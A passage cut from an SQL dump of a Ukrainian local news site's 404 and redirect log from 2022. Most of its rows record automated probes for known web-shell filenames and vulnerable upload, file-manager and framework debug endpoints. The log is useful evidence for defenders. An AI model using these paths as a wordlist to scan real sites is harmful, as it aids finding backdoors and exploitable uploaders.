00:00:00',301),(36928,'https://malehus.in.ua/3index.php',NULL,'https://www.google.com','',14,0,'2022-03-20 03:34:11','0000-00-00 00:00:00',301),(36929,'https://malehus.in.ua/wikindex.php',NULL,'https://www.google.com','',21,0,'2022-03-20 03:34:11','0000-00-00 00:00:00',301),(36930,'https://malehus.in.ua/wso1.php',NULL,'https://www.google.com','',13,0,'2022-03-20 03:34:12','0000-00-00 00:00:00',301),(36931,'https://malehus.in.ua/priv8.php',NULL,'https://www.google.com','',13,0,'2022-03-20 03:34:14','0000-00-00 00:00:00',301),(36932,'https://malehus.in.ua/bb.php',NULL,'https://www.google.com','',6,0,'2022-03-20 03:34:14','0000-00-00 00:00:00',301),(36933,'https://malehus.in.ua/m.php',NULL,'https://www.google.com','',13,0,'2022-03-20 03:34:15','0000-00-00 00:00:00',301),(36934,'https://malehus.in.ua/lux.php',NULL,'https://www.google.com','',3,0,'2022-03-20 03:34:15','0000-00-00 00:00:00',301),(36935,'https://malehus.in.ua/haxor.php',NULL,'https://www.google.com','',14,0,'2022-03-20 03:34:16','0000-00-00 00:00:00',301),(36936,'https://malehus.in.ua/shell4.php',NULL,'https://www.google.com','',4,0,'2022-03-20 03:34:17','0000-00-00 00:00:00',301),(36937,'https://malehus.in.ua/ru.php',NULL,'https://www.google.com','',4,0,'2022-03-20 03:34:18','0000-00-00 00:00:00',301),(36938,'https://malehus.in.ua/if.php',NULL,'https://www.google.com','',3,0,'2022-03-20 03:34:18','0000-00-00 00:00:00',301),(36939,'https://malehus.in.ua/vuln.php',NULL,'https://www.google.com','',12,0,'2022-03-20 03:34:19','0000-00-00 00:00:00',301),(36940,'https://malehus.in.ua/skipper.php',NULL,'https://www.google.com','',3,0,'2022-03-20 03:34:20','0000-00-00 00:00:00',301),(36941,'https://malehus.in.ua/skippershell.php',NULL,'https://www.google.com','',3,0,'2022-03-20 03:34:20','0000-00-00 00:00:00',301),(36942,'https://malehus.in.ua/tttt.php',NULL,'https://www.google.com','',2,0,'2022-03-20 03:34:21','0000-00-00 00:00:00',301),(36943,'https://malehus.in.ua/tshop.php',NULL,'https://www.google.com','',2,0,'2022-03-20 03:34:22','0000-00-00 00:00:00',301),(36944,'https://malehus.in.ua/inje3ctor.php',NULL,'https://www.google.com','',2,0,'2022-03-20 03:34:22','0000-00-00 00:00:00',301),(36945,'https://malehus.in.ua/saudi.php',NULL,'https://www.google.com','',4,0,'2022-03-20 03:34:23','0000-00-00 00:00:00',301),(36946,'https://malehus.in.ua/alfashell.php',NULL,'https://www.google.com','',12,0,'2022-03-20 03:34:23','0000-00-00 00:00:00',301),(36947,'https://malehus.in.ua/my_alfa.php',NULL,'https://www.google.com','',2,0,'2022-03-20 03:34:24','0000-00-00 00:00:00',301),(36948,'https://malehus.in.ua/uploader.php',NULL,'https://www.google.com','',15,0,'2022-03-20 03:34:25','0000-00-00 00:00:00',301),(36949,'https://malehus.in.ua/hacked.php',NULL,'https://www.google.com','',3,0,'2022-03-20 03:34:26','0000-00-00 00:00:00',301),(36950,'https://malehus.in.ua/c99.php',NULL,'https://www.google.com','',15,0,'2022-03-20 03:34:26','0000-00-00 00:00:00',301),(36951,'https://malehus.in.ua/navir.php',NULL,'https://www.google.com','',2,0,'2022-03-20 03:34:27','0000-00-00 00:00:00',301),(36952,'https://malehus.in.ua/cmd13.php',NULL,'https://www.google.com','',2,0,'2022-03-20 03:34:27','0000-00-00 00:00:00',301),(36953,'https://malehus.in.ua/inc20k1.php',NULL,'https://www.google.com','',2,0,'2022-03-20 03:34:28','0000-00-00 00:00:00',301),(36954,'https://malehus.in.ua/404.php',NULL,'https://www.google.com','',15,0,'2022-03-20 03:34:29','0000-00-00 00:00:00',301),(36955,'https://malehus.in.ua/swm.php',NULL,'https://www.google.com','',3,0,'2022-03-20 03:34:29','0000-00-00 00:00:00',301),(36956,'https://malehus.in.ua/shx.php',NULL,'https://www.google.com','',13,0,'2022-03-20 03:34:30','0000-00-00 00:00:00',301),(36957,'https://malehus.in.ua/ws.php',NULL,'https://www.google.com','',13,0,'2022-03-20 03:34:31','0000-00-00 00:00:00',301),(36958,'https://malehus.in.ua/edit-form.php',NULL,'https://www.google.com','',13,0,'2022-03-20 03:34:31','0000-00-00 00:00:00',301),(36959,'https://malehus.in.ua/leafmailer.php',NULL,'https://www.google.com','',6,0,'2022-03-20 03:34:33','0000-00-00 00:00:00',301),(36960,'https://malehus.in.ua/owl.php',NULL,'https://www.google.com','',3,0,'2022-03-20 03:34:34','0000-00-00 00:00:00',301),(36961,'https://malehus.in.ua/0.php',NULL,'https://www.google.com','',13,0,'2022-03-20 03:34:35','0000-00-00 00:00:00',301),(36962,'https://malehus.in.ua/alexus.php',NULL,'https://www.google.com','',4,0,'2022-03-20 03:34:36','0000-00-00 00:00:00',301),(36963,'https://malehus.in.ua/send.php',NULL,'https://www.google.com','',3,0,'2022-03-20 03:34:37','0000-00-00 00:00:00',301),(36964,'https://malehus.in.ua/class-wp-widget-archives.php',NULL,'','',6,0,'2022-03-20 14:29:05','0000-00-00 00:00:00',301),(36965,'https://malehus.in.ua/assets/plugins/fileupload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',2,0,'2022-03-21 12:23:10','0000-00-00 00:00:00',301),(36966,'https://malehus.in.ua/feed/',NULL,'','',14,0,'2022-03-21 15:01:43','0000-00-00 00:00:00',301),(36967,'https://malehus.in.ua/admin/fileupload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',3,0,'2022-03-24 01:17:46','0000-00-00 00:00:00',301),(36968,'https://malehus.in.ua/11index.php',NULL,'','',11,0,'2022-03-25 14:21:15','0000-00-00 00:00:00',301),(36969,'https://malehus.in.ua/2index.php',NULL,'','',16,0,'2022-03-25 14:21:19','0000-00-00 00:00:00',301),(36970,'https://malehus.in.ua/111nocache.php',NULL,'','',1,0,'2022-03-25 14:21:28','0000-00-00 00:00:00',301),(36971,'https://malehus.in.ua/utchiha.php',NULL,'','',1,0,'2022-03-25 14:21:30','0000-00-00 00:00:00',301),(36972,'https://malehus.in.ua/wp-admin/setup-config.php',NULL,'','',3,0,'2022-03-25 14:21:34','0000-00-00 00:00:00',301),(36973,'https://malehus.in.ua/unix.php',NULL,'','',2,0,'2022-03-25 14:21:41','0000-00-00 00:00:00',301),(36974,'https://malehus.in.ua/small.php',NULL,'','',11,0,'2022-03-25 14:21:43','0000-00-00 00:00:00',301),(36975,'https://malehus.in.ua/demo328/fw.php',NULL,'','',3,0,'2022-03-25 14:21:50','0000-00-00 00:00:00',301),(36976,'https://malehus.in.ua/wp-admin/includes/class-wp-media-list-data.php',NULL,'','',11,0,'2022-03-25 14:22:07','0000-00-00 00:00:00',301),(36977,'https://malehus.in.ua/0byte.php',NULL,'','',12,0,'2022-03-25 14:22:13','0000-00-00 00:00:00',301),(36978,'https://malehus.in.ua/autoload_classmap.php',NULL,'','',14,0,'2022-03-25 14:22:18','0000-00-00 00:00:00',301),(36979,'https://malehus.in.ua/stindex.php',NULL,'','',2,0,'2022-03-25 14:22:30','0000-00-00 00:00:00',301),(36980,'https://malehus.in.ua/alwso.php',NULL,'','',14,0,'2022-03-25 14:22:35','0000-00-00 00:00:00',301),(36981,'https://malehus.in.ua/fx.php',NULL,'','',12,0,'2022-03-25 14:22:38','0000-00-00 00:00:00',301),(36982,'https://malehus.in.ua/sym.php',NULL,'','',2,0,'2022-03-25 14:22:42','0000-00-00 00:00:00',301),(36983,'https://malehus.in.ua/sym403.php',NULL,'','',3,0,'2022-03-25 14:22:44','0000-00-00 00:00:00',301),(36984,'https://malehus.in.ua/dkiz.php',NULL,'','',2,0,'2022-03-25 14:22:47','0000-00-00 00:00:00',301),(36985,'https://malehus.in.ua/xl.php',NULL,'','',11,0,'2022-03-25 14:22:53','0000-00-00 00:00:00',301),(36986,'https://malehus.in.ua/symlink.php',NULL,'','',2,0,'2022-03-25 14:22:56','0000-00-00 00:00:00',301),(36987,'https://malehus.in.ua/mini.php',NULL,'','',13,0,'2022-03-25 14:23:09','0000-00-00 00:00:00',301),(36988,'https://malehus.in.ua/kindex.php',NULL,'','',1,0,'2022-03-25 14:23:21','0000-00-00 00:00:00',301),(36989,'https://malehus.in.ua/sindex.php',NULL,'','',3,0,'2022-03-25 14:23:26','0000-00-00 00:00:00',301),(36990,'https://malehus.in.ua/baindex.php',NULL,'','',5,0,'2022-03-25 14:23:29','0000-00-00 00:00:00',301),(36991,'https://malehus.in.ua/new-index.php',NULL,'','',5,0,'2022-03-25 14:23:32','0000-00-00 00:00:00',301),(36992,'https://malehus.in.ua/qindex.php',NULL,'','',6,0,'2022-03-25 14:23:35','0000-00-00 00:00:00',301),(36993,'https://malehus.in.ua/403.php',NULL,'','',14,0,'2022-03-25 14:23:41','0000-00-00 00:00:00',301),(36994,'https://malehus.in.ua/ok.php',NULL,'','',11,0,'2022-03-25 14:23:53','0000-00-00 00:00:00',301),(36995,'https://malehus.in.ua/2.php',NULL,'','',12,0,'2022-03-25 14:24:09','0000-00-00 00:00:00',301),(36996,'https://malehus.in.ua/3.php',NULL,'','',11,0,'2022-03-25 14:24:13','0000-00-00 00:00:00',301),(36997,'https://malehus.in.ua/4.php',NULL,'','',11,0,'2022-03-25 14:24:15','0000-00-00 00:00:00',301),(36998,'https://malehus.in.ua/5.php',NULL,'','',12,0,'2022-03-25 14:24:19','0000-00-00 00:00:00',301),(36999,'https://malehus.in.ua/6.php',NULL,'','',1,0,'2022-03-25 14:24:21','0000-00-00 00:00:00',301),(37000,'https://malehus.in.ua/7.php',NULL,'','',3,0,'2022-03-25 14:24:26','0000-00-00 00:00:00',301),(37001,'https://malehus.in.ua/8.php',NULL,'','',1,0,'2022-03-25 14:24:28','0000-00-00 00:00:00',301),(37002,'https://malehus.in.ua/9.php',NULL,'','',11,0,'2022-03-25 14:24:31','0000-00-00 00:00:00',301),(37003,'https://malehus.in.ua/10.php',NULL,'','',11,0,'2022-03-25 14:24:34','0000-00-00 00:00:00',301),(37004,'https://malehus.in.ua/e.php',NULL,'','',11,0,'2022-03-25 14:24:46','0000-00-00 00:00:00',301),(37005,'https://malehus.in.ua/r.php',NULL,'','',10,0,'2022-03-25 14:24:50','0000-00-00 00:00:00',301),(37006,'https://malehus.in.ua/t.php',NULL,'','',2,0,'2022-03-25 14:24:51','0000-00-00 00:00:00',301),(37007,'https://malehus.in.ua/y.php',NULL,'','',10,0,'2022-03-25 14:24:56','0000-00-00 00:00:00',301),(37008,'https://malehus.in.ua/u.php',NULL,'','',10,0,'2022-03-25 14:25:00','0000-00-00 00:00:00',301),(37009,'https://malehus.in.ua/i.php',NULL,'','',11,0,'2022-03-25 14:25:02','0000-00-00 00:00:00',301),(37010,'https://malehus.in.ua/o.php',NULL,'','',11,0,'2022-03-25 14:25:06','0000-00-00 00:00:00',301),(37011,'https://malehus.in.ua/p.php',NULL,'','',11,0,'2022-03-25 14:25:10','0000-00-00 00:00:00',301),(37012,'https://malehus.in.ua/q.php',NULL,'','',10,0,'2022-03-25 14:25:12','0000-00-00 00:00:00',301),(37013,'https://malehus.in.ua/s.php',NULL,'','',10,0,'2022-03-25 14:25:15','0000-00-00 00:00:00',301),(37014,'https://malehus.in.ua/d.php',NULL,'','',3,0,'2022-03-25 14:25:17','0000-00-00 00:00:00',301),(37015,'https://malehus.in.ua/f.php',NULL,'','',11,0,'2022-03-25 14:25:19','0000-00-00 00:00:00',301),(37016,'https://malehus.in.ua/g.php',NULL,'','',11,0,'2022-03-25 14:25:24','0000-00-00 00:00:00',301),(37017,'https://malehus.in.ua/h.php',NULL,'','',11,0,'2022-03-25 14:25:27','0000-00-00 00:00:00',301),(37018,'https://malehus.in.ua/j.php',NULL,'','',1,0,'2022-03-25 14:25:30','0000-00-00 00:00:00',301),(37019,'https://malehus.in.ua/k.php',NULL,'','',11,0,'2022-03-25 14:25:32','0000-00-00 00:00:00',301),(37020,'https://malehus.in.ua/l.php',NULL,'','',12,0,'2022-03-25 14:25:34','0000-00-00 00:00:00',301),(37021,'https://malehus.in.ua/w.php',NULL,'','',11,0,'2022-03-25 14:25:40','0000-00-00 00:00:00',301),(37022,'https://malehus.in.ua/v.php',NULL,'','',11,0,'2022-03-25 14:25:44','0000-00-00 00:00:00',301),(37023,'https://malehus.in.ua/n.php',NULL,'','',12,0,'2022-03-25 14:25:48','0000-00-00 00:00:00',301),(37024,'https://malehus.in.ua/b.php',NULL,'','',11,0,'2022-03-25 14:25:51','0000-00-00 00:00:00',301),(37025,'https://malehus.in.ua/c.php',NULL,'','',12,0,'2022-03-25 14:25:55','0000-00-00 00:00:00',301),(37026,'https://malehus.in.ua/data.php',NULL,'','',3,0,'2022-03-25 14:25:57','0000-00-00 00:00:00',301),(37027,'https://malehus.in.ua/wp-blog.php',NULL,'','',10,0,'2022-03-25 14:25:59','0000-00-00 00:00:00',301),(37028,'https://malehus.in.ua/foxwso.php',NULL,'','',11,0,'2022-03-25 14:26:03','0000-00-00 00:00:00',301),(37029,'https://malehus.in.ua/wp-wso.php',NULL,'','',1,0,'2022-03-25 14:26:08','0000-00-00 00:00:00',301),(37030,'https://malehus.in.ua/minimo.php',NULL,'','',3,0,'2022-03-25 14:26:15','0000-00-00 00:00:00',301),(37031,'https://malehus.in.ua/v3.php',NULL,'','',3,0,'2022-03-25 14:26:18','0000-00-00 00:00:00',301),(37032,'https://malehus.in.ua/v5.php',NULL,'','',6,0,'2022-03-25 14:26:20','0000-00-00 00:00:00',301),(37033,'https://malehus.in.ua/www.php',NULL,'','',3,0,'2022-03-25 14:26:23','0000-00-00 00:00:00',301),(37034,'https://malehus.in.ua/777.php',NULL,'','',3,0,'2022-03-25 14:26:30','0000-00-00 00:00:00',301),(37035,'https://malehus.in.ua/xox.php',NULL,'','',1,0,'2022-03-25 14:26:37','0000-00-00 00:00:00',301),(37036,'https://malehus.in.ua/wi.php',NULL,'','',1,0,'2022-03-25 14:26:43','0000-00-00 00:00:00',301),(37037,'https://malehus.in.ua/mar.php',NULL,'','',12,0,'2022-03-25 14:26:45','0000-00-00 00:00:00',301),(37038,'https://malehus.in.ua/root.php',NULL,'','',13,0,'2022-03-25 14:26:48','0000-00-00 00:00:00',301),(37039,'https://malehus.in.ua/nee.php',NULL,'','',1,0,'2022-03-25 14:26:51','0000-00-00 00:00:00',301),(37040,'https://malehus.in.ua/lol.php',NULL,'','',1,0,'2022-03-25 14:26:56','0000-00-00 00:00:00',301),(37041,'https://malehus.in.ua/87.php',NULL,'','',1,0,'2022-03-25 14:27:02','0000-00-00 00:00:00',301),(37042,'https://malehus.in.ua/7yn.php',NULL,'','',1,0,'2022-03-25 14:27:05','0000-00-00 00:00:00',301),(37043,'https://malehus.in.ua/13.php',NULL,'','',11,0,'2022-03-25 14:27:10','0000-00-00 00:00:00',301),(37044,'https://malehus.in.ua/foxwsov1.php',NULL,'','',2,0,'2022-03-25 14:27:12','0000-00-00 00:00:00',301),(37045,'https://malehus.in.ua/alf.php',NULL,'','',12,0,'2022-03-25 14:27:15','0000-00-00 00:00:00',301),(37046,'https://malehus.in.ua/hello.php',NULL,'','',11,0,'2022-03-25 14:27:31','0000-00-00 00:00:00',301),(37047,'https://malehus.in.ua/kk.php',NULL,'','',3,0,'2022-03-25 14:27:38','0000-00-00 00:00:00',301),(37048,'https://malehus.in.ua/mrjn.php',NULL,'','',1,0,'2022-03-25 14:27:43','0000-00-00 00:00:00',301),(37049,'https://malehus.in.ua/kn.php',NULL,'','',1,0,'2022-03-25 14:27:46','0000-00-00 00:00:00',301),(37050,'https://malehus.in.ua/3301.php',NULL,'','',1,0,'2022-03-25 14:27:48','0000-00-00 00:00:00',301),(37051,'https://malehus.in.ua/anone.php',NULL,'','',1,0,'2022-03-25 14:27:58','0000-00-00 00:00:00',301),(37052,'https://malehus.in.ua/wp-configer.php',NULL,'','',1,0,'2022-03-25 14:28:01','0000-00-00 00:00:00',301),(37053,'https://malehus.in.ua/wp-ad.php',NULL,'','',1,0,'2022-03-25 14:28:03','0000-00-00 00:00:00',301),(37054,'https://malehus.in.ua/.wp-cache.php',NULL,'','',1,0,'2022-03-25 14:28:10','0000-00-00 00:00:00',301),(37055,'https://malehus.in.ua/sendmail.php',NULL,'','',2,0,'2022-03-25 14:28:12','0000-00-00 00:00:00',301),(37056,'https://malehus.in.ua/rahma.php',NULL,'','',1,0,'2022-03-25 14:28:14','0000-00-00 00:00:00',301),(37057,'https://malehus.in.ua/nasgor.php',NULL,'','',1,0,'2022-03-25 14:28:18','0000-00-00 00:00:00',301),(37058,'https://malehus.in.ua/wp-confirm.php',NULL,'','',1,0,'2022-03-25 14:28:23','0000-00-00 00:00:00',301),(37059,'https://malehus.in.ua/alfa123.php',NULL,'','',1,0,'2022-03-25 14:28:25','0000-00-00 00:00:00',301),(37060,'https://malehus.in.ua/bypass.php',NULL,'','',12,0,'2022-03-25 14:28:29','0000-00-00 00:00:00',301),(37061,'https://malehus.in.ua/wp-one.php',NULL,'','',2,0,'2022-03-25 14:28:33','0000-00-00 00:00:00',301),(37062,'https://malehus.in.ua/wso1337.php',NULL,'','',1,0,'2022-03-25 14:28:39','0000-00-00 00:00:00',301),(37063,'https://malehus.in.ua/blog.php',NULL,'','',11,0,'2022-03-25 14:28:45','0000-00-00 00:00:00',301),(37064,'https://malehus.in.ua/it.php',NULL,'','',1,0,'2022-03-25 14:28:51','0000-00-00 00:00:00',301),(37065,'https://malehus.in.ua/kiss.php',NULL,'','',1,0,'2022-03-25 14:28:53','0000-00-00 00:00:00',301),(37066,'https://malehus.in.ua/wp2.php',NULL,'','',10,0,'2022-03-25 14:28:57','0000-00-00 00:00:00',301),(37067,'https://malehus.in.ua/ohayo.php',NULL,'','',1,0,'2022-03-25 14:29:07','0000-00-00 00:00:00',301),(37068,'https://malehus.in.ua/cms.php',NULL,'','',1,0,'2022-03-25 14:29:17','0000-00-00 00:00:00',301),(37069,'https://malehus.in.ua/wp-uploads.php',NULL,'','',10,0,'2022-03-25 14:29:19','0000-00-00 00:00:00',301),(37070,'https://malehus.in.ua/gel.php',NULL,'','',1,0,'2022-03-25 14:29:23','0000-00-00 00:00:00',301),(37071,'https://malehus.in.ua/41.php',NULL,'','',1,0,'2022-03-25 14:29:27','0000-00-00 00:00:00',301),(37072,'https://malehus.in.ua/4price.php',NULL,'','',1,0,'2022-03-25 14:29:32','0000-00-00 00:00:00',301),(37073,'https://malehus.in.ua/.fk.php',NULL,'','',1,0,'2022-03-25 14:29:39','0000-00-00 00:00:00',301),(37074,'https://malehus.in.ua/alexuse.php',NULL,'','',1,0,'2022-03-25 14:29:47','0000-00-00 00:00:00',301),(37075,'https://malehus.in.ua/sendemail.php',NULL,'','',1,0,'2022-03-25 14:29:50','0000-00-00 00:00:00',301),(37076,'https://malehus.in.ua/content.php',NULL,'','',13,0,'2022-03-25 14:29:53','0000-00-00 00:00:00',301),(37077,'https://malehus.in.ua/olu.php',NULL,'','',1,0,'2022-03-25 14:29:58','0000-00-00 00:00:00',301),(37078,'https://malehus.in.ua/alexusmailer 2.0.php',NULL,'','',1,0,'2022-03-25 14:30:00','0000-00-00 00:00:00',301),(37079,'https://malehus.in.ua/rss.php',NULL,'','',10,0,'2022-03-25 14:30:02','0000-00-00 00:00:00',301),(37080,'https://malehus.in.ua/alexus-mailer.php',NULL,'','',1,0,'2022-03-25 14:30:05','0000-00-00 00:00:00',301),(37081,'https://malehus.in.ua/wp-file.php',NULL,'','',10,0,'2022-03-25 14:30:07','0000-00-00 00:00:00',301),(37082,'https://malehus.in.ua/wso2.php',NULL,'','',9,0,'2022-03-25 14:30:09','0000-00-00 00:00:00',301),(37083,'https://malehus.in.ua/wp-info.php',NULL,'','',12,0,'2022-03-25 14:30:20','0000-00-00 00:00:00',301),(37084,'https://malehus.in.ua/wp-confiig.php',NULL,'','',1,0,'2022-03-25 14:30:23','0000-00-00 00:00:00',301),(37085,'https://malehus.in.ua/file-manager.php',NULL,'','',1,0,'2022-03-25 14:30:25','0000-00-00 00:00:00',301),(37086,'https://malehus.in.ua/alfa_data/alfacgiapi/perl.alfa',NULL,'www.google.com','',7,0,'2022-03-25 19:20:01','0000-00-00 00:00:00',301),(37087,'https://malehus.in.ua/alfacgiapi/perl.alfa',NULL,'www.google.com','',6,0,'2022-03-25 19:20:02','0000-00-00 00:00:00',301),(37088,'https://malehus.in.ua/wp-content/alfa_data/alfacgiapi/perl.alfa',NULL,'www.google.com','',1,0,'2022-03-25 19:20:02','0000-00-00 00:00:00',301),(37089,'https://malehus.in.ua/wp-content/alfacgiapi/perl.alfa',NULL,'www.google.com','',3,0,'2022-03-25 19:20:03','0000-00-00 00:00:00',301),(37090,'https://malehus.in.ua/blog',NULL,'','',19,0,'2022-03-25 19:35:58','0000-00-00 00:00:00',301),(37091,'https://malehus.in.ua/video/2545-vistavka-golubiv-v-borodyantsi-20-02-2022-roku',NULL,'','',7,0,'2022-03-26 10:34:27','0000-00-00 00:00:00',301),(37092,'https://malehus.in.ua/assets/plugins/plupload/examples/upload.php',NULL,'','',1,0,'2022-03-28 02:47:21','0000-00-00 00:00:00',301),(37093,'https://malehus.in.ua/xlet.php',NULL,'','',1,0,'2022-03-28 20:02:55','0000-00-00 00:00:00',301),(37094,'https://malehus.in.ua/jindex.php',NULL,'','',12,0,'2022-03-28 20:02:56','0000-00-00 00:00:00',301),(37095,'https://malehus.in.ua/sh3llx.php',NULL,'','',1,0,'2022-03-28 20:02:56','0000-00-00 00:00:00',301),(37096,'https://malehus.in.ua/takeout.php',NULL,'','',2,0,'2022-03-28 20:02:57','0000-00-00 00:00:00',301),(37097,'https://malehus.in.ua/xleet-shell.php',NULL,'','',11,0,'2022-03-28 20:02:57','0000-00-00 00:00:00',301),(37098,'https://malehus.in.ua/assets/global/plugins/plupload/examples/upload.php',NULL,'','',1,0,'2022-03-30 08:16:27','0000-00-00 00:00:00',301),(37099,'https://malehus.in.ua/modules/mod_araticlws/mod_araticlws.php',NULL,'www.google.com','',2,0,'2022-04-01 08:40:20','0000-00-00 00:00:00',301),(37100,'https://malehus.in.ua/public/assets/plugins/plupload/examples/upload.php',NULL,'','',1,0,'2022-04-01 09:42:41','0000-00-00 00:00:00',301),(37101,'https://malehus.in.ua/admin/assets/plugins/plupload/examples/upload.php',NULL,'','',1,0,'2022-04-03 06:03:01','0000-00-00 00:00:00',301),(37102,'https://malehus.in.ua/assets/admin/plugins/plupload/examples/upload.php',NULL,'','',1,0,'2022-04-05 02:54:14','0000-00-00 00:00:00',301),(37103,'https://malehus.in.ua/file-uploader/server/php/index.php?file=tx2rghf.jpg',NULL,'','',1,0,'2022-04-07 05:37:42','0000-00-00 00:00:00',301),(37104,'https://malehus.in.ua/_ignition/health-check/',NULL,'http://malehus.in.ua/_ignition/health-check/','',28,0,'2022-04-07 06:58:44','0000-00-00 00:00:00',301),(37105,'https://malehus.in.ua/public/_ignition/health-check/',NULL,'http://malehus.in.ua/public/_ignition/health-check/','',28,0,'2022-04-07 06:58:48','0000-00-00 00:00:00',301),(37106,'https://malehus.in.ua/laravel/_ignition/health-check/',NULL,'http://malehus.in.ua/laravel/_ignition/health-check/','',1,0,'2022-04-07 06:58:51','0000-00-00 00:00:00',301),(37107,'https://malehus.in.ua/test_404_page/',NULL,'','',8,0,'2022-04-08 00:36:02','0000-00-00 00:00:00',301),(37108,'https://malehus.in.ua/assets/file-uploader/server/php/index.php?file=tx2rghf.jpg',NULL,'','',1,0,'2022-04-08 17:38:17','0000-00-00 00:00:00',301),(37109,'https://malehus.in.ua/.ds_store',NULL,'','',6,0,'2022-04-08 20:02:21','0000-00-00 00:00:00',301),(37110,'https://malehus.in.ua/js/_system/jquery-file-upload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-04-10 15:20:55','0000-00-00 00:00:00',301),(37111,'https://malehus.in.ua/assets/plugins/elfinder/connectors/php/connector.php',NULL,'','',1,0,'2022-04-13 12:42:45','0000-00-00 00:00:00',301),(37112,'https://malehus.in.ua/public/plugins/elfinder/connectors/php/connector.php',NULL,'','',1,0,'2022-04-15 10:53:31','0000-00-00 00:00:00',301),(37113,'https://malehus.in.ua/wp-json/wp/v2/users',NULL,'','',3,0,'2022-04-16 01:48:39','0000-00-00 00:00:00',301),(37114,'https://www.malehus.in.ua/8-novini-2/2544-kilka-pitan-shchodo-nichnogo-tarifu-na-elektroenergiyu',NULL,'','',2,0,'2022-04-17 13:52:05','0000-00-00 00:00:00',301),(37115,'https://malehus.in.ua/assets/plugins/elfinder/src/connectors/php/connector.php',NULL,'','',1,0,'2022-04-17 15:25:52','0000-00-00 00:00:00',301),(37116,'https://malehus.in.ua/wp-content/themes/sketch/404.php',NULL,'www.google.com','',4,0,'2022-04-17 16:05:24','0000-00-00 00:00:00',301),(37117,'https://malehus.in.ua/wp-content/themes/twentyfive/include.php',NULL,'www.google.com','',3,0,'2022-04-17 16:05:36','0000-00-00 00:00:00',301),(37118,'https://malehus.in.ua/wp/wp-content/themes/sketch/404.php',NULL,'www.google.com','',2,0,'2022-04-17 16:05:45','0000-00-00 00:00:00',301),(37119,'https://malehus.in.ua/wordpress/wp-content/themes/sketch/404.php',NULL,'www.google.com','',3,0,'2022-04-17 16:05:52','0000-00-00 00:00:00',301),(37120,'https://malehus.in.ua/blog/wp-content/themes/sketch/404.php',NULL,'www.google.com','',2,0,'2022-04-17 16:06:04','0000-00-00 00:00:00',301),(37121,'https://malehus.in.ua/site/wp-content/themes/sketch/404.php',NULL,'www.google.com','',1,0,'2022-04-17 16:06:13','0000-00-00 00:00:00',301),(37122,'https://malehus.in.ua/malynlis.com.ua',NULL,'','',1,0,'2022-04-17 20:39:30','0000-00-00 00:00:00',301),(37123,'https://malehus.in.ua/malinapk.net',NULL,'','',1,0,'2022-04-17 20:39:30','0000-00-00 00:00:00',301),(37124,'https://malehus.in.ua/unigran.ua',NULL,'','',1,0,'2022-04-17 20:39:30','0000-00-00 00:00:00',301),(37125,'https://malehus.in.ua/sinoptik.ua',NULL,'','',1,0,'2022-04-17 20:39:30','0000-00-00 00:00:00',301),(37126,'https://malehus.in.ua/radio-online.com.ua',NULL,'','',1,0,'2022-04-17 20:39:31','0000-00-00 00:00:00',301),(37127,'https://malehus.in.ua/weidmann-mpm.com',NULL,'','',1,0,'2022-04-17 20:39:31','0000-00-00 00:00:00',301),(37128,'https://malehus.in.ua/history-malyn.in.ua',NULL,'','',1,0,'2022-04-17 20:39:31','0000-00-00 00:00:00',301),(37129,'https://malehus.in.ua/gazpravda.com.ua',NULL,'','',1,0,'2022-04-17 20:39:31','0000-00-00 00:00:00',301),(37130,'https://malehus.in.ua/dilovamova.com',NULL,'','',1,0,'2022-04-17 20:39:31','0000-00-00 00:00:00',301),(37131,'https://malehus.in.ua/blogspot.com',NULL,'','',1,0,'2022-04-17 20:39:31','0000-00-00 00:00:00',301),(37132,'https://malehus.in.ua/mltk.co.ua',NULL,'','',1,0,'2022-04-17 20:39:31','0000-00-00 00:00:00',301),(37133,'https://malehus.in.ua/vipgranit.com.ua',NULL,'','',1,0,'2022-04-17 20:39:31','0000-00-00 00:00:00',301),(37134,'https://malehus.in.ua/mjoyradio.com',NULL,'','',1,0,'2022-04-17 20:39:31','0000-00-00 00:00:00',301),(37135,'https://malehus.in.ua/malyn-rada.gov.ua',NULL,'','',1,0,'2022-04-17 20:39:31','0000-00-00 00:00:00',301),(37136,'https://malehus.in.ua/pmsd.org.ua',NULL,'','',1,0,'2022-04-17 20:39:31','0000-00-00 00:00:00',301),(37137,'https://malehus.in.ua/ucoz.com',NULL,'','',1,0,'2022-04-17 20:39:31','0000-00-00 00:00:00',301),(37138,'https://malehus.in.ua/at.ua',NULL,'','',1,0,'2022-04-17 20:39:31','0000-00-00 00:00:00',301),(37139,'https://malehus.in.ua/admin/elfinder/src/connectors/php/connector.php',NULL,'','',1,0,'2022-04-19 11:51:14','0000-00-00 00:00:00',301),(37140,'https://malehus.in.ua/plugins/elfinder/connectors/php/connector.php',NULL,'','',1,0,'2022-04-21 12:45:20','0000-00-00 00:00:00',301),(37141,'https://malehus.in.ua/new/wp-content/themes/sketch/404.php',NULL,'','',1,0,'2022-04-22 04:31:37','0000-00-00 00:00:00',301),(37142,'https://malehus.in.ua/test/wp-content/themes/sketch/404.php',NULL,'','',1,0,'2022-04-22 04:31:38','0000-00-00 00:00:00',301),(37143,'https://malehus.in.ua/old/wp-content/themes/sketch/404.php',NULL,'','',1,0,'2022-04-22 04:31:38','0000-00-00 00:00:00',301),(37144,'https://malehus.in.ua/backup/wp-content/themes/sketch/404.php',NULL,'','',1,0,'2022-04-22 04:31:39','0000-00-00 00:00:00',301),(37145,'https://malehus.in.ua/wp/wp-content/plugins/apikey/apikey.php?test=hello',NULL,'','',2,0,'2022-04-22 04:31:44','0000-00-00 00:00:00',301),(37146,'https://malehus.in.ua/wordpress/wp-content/plugins/apikey/apikey.php?test=hello',NULL,'','',2,0,'2022-04-22 04:31:47','0000-00-00 00:00:00',301),(37147,'https://malehus.in.ua/blog/wp-content/plugins/apikey/apikey.php?test=hello',NULL,'','',2,0,'2022-04-22 04:31:49','0000-00-00 00:00:00',301),(37148,'https://malehus.in.ua/new/wp-content/plugins/apikey/apikey.php?test=hello',NULL,'','',2,0,'2022-04-22 04:31:51','0000-00-00 00:00:00',301),(37149,'https://malehus.in.ua/test/wp-content/plugins/apikey/apikey.php?test=hello',NULL,'','',2,0,'2022-04-22 04:31:53','0000-00-00 00:00:00',301),(37150,'https://malehus.in.ua/old/wp-content/plugins/apikey/apikey.php?test=hello',NULL,'','',2,0,'2022-04-22 04:31:55','0000-00-00 00:00:00',301),(37151,'https://malehus.in.ua/backup/wp-content/plugins/apikey/apikey.php?test=hello',NULL,'','',2,0,'2022-04-22 